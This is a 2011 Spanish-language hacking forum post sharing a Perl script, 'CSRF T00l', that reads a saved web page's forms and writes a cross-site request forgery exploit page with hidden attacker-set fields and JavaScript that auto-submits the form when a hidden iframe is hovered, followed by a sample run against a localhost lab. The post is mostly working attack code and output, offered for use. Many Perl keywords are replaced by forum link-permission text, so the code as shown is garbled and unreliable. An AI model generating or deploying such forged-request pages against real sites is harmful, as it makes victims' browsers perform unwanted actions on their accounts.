comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl] CSRF T00l

  • 0 Respuestas
  • 1085 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Julio 03, 2011, 10:06:21 pm »
Una simple herramienta para ahorrar trabajo en la creacion de un exploit
para la vulnerabildiad Cross Site Request Forgery , despues genera el resultado
en una carpeta creada con el programa con el nombre de la web.

Código: Perl
  1. #!usr/bin/perl
  2. #CSRF T00l (C) Doddy Hackman 2011
  3.  
  4. use HTML::Form;
  5. use URI::Split No tienes permisos para ver links. Registrate o Entra con tu cuenta(uri_split);
  6.  
  7. installer();
  8.  
  9. head();
  10. if($ARGV[0]) {
  11. now($ARGV[0]);
  12. } else {
  13. sintax();
  14. }
  15. copyright();
  16.  
  17. sub now {
  18.  
  19. unless(-f $_[0]) {
  20. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[-] File Not Found\n";
  21. copyright();
  22. }
  23.  
  24. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] File to parse : ".$_[0]."\n\n";
  25.  
  26. No tienes permisos para ver links. Registrate o Entra con tu cuenta(FILE,$_[0]);
  27. my $words = No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(),<FILE>;
  28. No tienes permisos para ver links. Registrate o Entra con tu cuenta(FILE);
  29.  
  30. my @testar = HTML::Form->parse($words,"/");
  31.  
  32. $count = 0;
  33. foreach my $test(@testar) {
  34. $count++;
  35. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n -- == Form $count == --\n\n";
  36. if ($test->attr(name) eq "") {
  37. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Name : No Found"."\n";
  38. } else {
  39. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Name : ".$test->attr(name)."\n";
  40. }
  41. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Action : ".$test->action."\n";  
  42. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Method : ".$test->method."\n";
  43. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n-- == Input == --\n\n";
  44. @inputs = $test->inputs;
  45. No tienes permisos para ver links. Registrate o Entra con tu cuenta "Type\t\tName\t\tValue\n";
  46. foreach $in(@inputs) {
  47. No tienes permisos para ver links. Registrate o Entra con tu cuenta $in->type."\t\t";
  48. No tienes permisos para ver links. Registrate o Entra con tu cuenta $in->name."\t\t";
  49. No tienes permisos para ver links. Registrate o Entra con tu cuenta $in->value."\t\t\n";
  50. }
  51. }  
  52. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] Form to generate : ";
  53. No tienes permisos para ver links. Registrate o Entra con tu cuenta(my $op = <stdin>);
  54. if ($op ne "") {
  55. $op--;
  56. my $probar = (HTML::Form->parse($words,"/"))[$op];
  57.  
  58. my $action = ver($words,$op);
  59. my $fin = nombre($action).".html";
  60. savefile("<form action=$action method=".$probar->method." name=exploit>",$fin);
  61. @input = $probar->inputs;
  62. foreach $in(@input) {
  63. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Value of the ".$in->name." : ";
  64. No tienes permisos para ver links. Registrate o Entra con tu cuenta(my $val = <stdin>);
  65. savefile("<input type=hidden name=".$in->name." value=".$val.">",$fin);
  66. }
  67. my $final = "</form><script language=javascript>function colocar(){document.exploit.submit()}
  68. </script><iframe width=6% height=%6 overflow=hidden onmouseover=javascript:colocar()>
  69. ";
  70. savefile($final,$fin);
  71. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] CSRF Exploit Generated\n\n";
  72. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] To can see in logscsrf/".$fin."\n\n";
  73. }
  74. }
  75.  
  76. sub ver {
  77. my $probar = (HTML::Form->parse($_[0],"/"))[$_[1]];
  78. my $action = $probar->action;
  79. my $co = $action;
  80. if ($action eq "" or $action eq "/"){
  81. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] Action : ";
  82. No tienes permisos para ver links. Registrate o Entra con tu cuenta(my $action = <stdin>);
  83. No tienes permisos para ver links. Registrate o Entra con tu cuenta $action;
  84. } else {
  85. No tienes permisos para ver links. Registrate o Entra con tu cuenta $co;
  86. }
  87. }
  88.  
  89. sub installer {
  90. unless (-d "logs_csrf/") {
  91. No tienes permisos para ver links. Registrate o Entra con tu cuenta("logs_csrf/","777");
  92. }}
  93.  
  94. sub nombre {
  95. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  96. No tienes permisos para ver links. Registrate o Entra con tu cuenta $auth;
  97. }
  98.  
  99. sub savefile {
  100. No tienes permisos para ver links. Registrate o Entra con tu cuenta (SAVE,">>logs_csrf/".$_[1]);
  101. No tienes permisos para ver links. Registrate o Entra con tu cuenta SAVE $_[0]."\n";
  102. No tienes permisos para ver links. Registrate o Entra con tu cuenta SAVE;
  103. }
  104.  
  105. sub sintax {
  106. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] sintax : $0 <file>\n";
  107. }
  108.  
  109. sub head {
  110. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n -- == CSRF T00l == --\n\n";
  111. }
  112.  
  113. sub copyright {
  114. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n -- == Doddy Hackman 2011 == --\n\n";
  115. No tienes permisos para ver links. Registrate o Entra con tu cuenta(1);
  116. }
  117.  
  118. # ¿ The End ?
  119.  

Ejemplo de uso

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta

C:\Documents and Settings\Administrador\Escritorio\Leviatan\Hacking\WarFactoy II
 Finales\CSRF Tool>tool.pl read.txt


 -- == CSRF T00l == --


[+] File to parse : read.txt



 -- == Form 1 == --

[+] Name : No Found
[+] Action : http://localhost/labs/csrf/csrf.php
[+] Method : GET

-- == Input == --

Type            Name            Value
text            ver
password                veras
submit          control         Agregar


 -- == Form 2 == --

[+] Name : No Found
[+] Action : /
[+] Method : POST

-- == Input == --

Type            Name            Value
text            ac
submit          ee              aaa


[+] Form to generate : 1

[+] Value of the ver : aaa

[+] Value of the veras : aaa

[+] Value of the control : aaa


[+] CSRF Exploit Generated

[+] To can see in logscsrf/localhost.html



 -- == Doddy Hackman 2011 == --


« Última modificación: Julio 17, 2011, 03:39:55 am por Sthefano02 »

 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 3231
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1513
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
DoSing IP 1.0 - [Creado por SkillmaX] + Source [PERL]

Iniciado por SkillmaX

Respuestas: 0
Vistas: 1398
Último mensaje Julio 04, 2010, 10:14:31 am
por SkillmaX
[Perl] Iframe DDos Attack Tool

Iniciado por BigBear

Respuestas: 0
Vistas: 1311
Último mensaje Julio 03, 2011, 10:06:45 pm
por BigBear
[Perl] Half Life Servers List 0.1

Iniciado por BigBear

Respuestas: 0
Vistas: 1140
Último mensaje Noviembre 12, 2012, 07:31:50 pm
por BigBear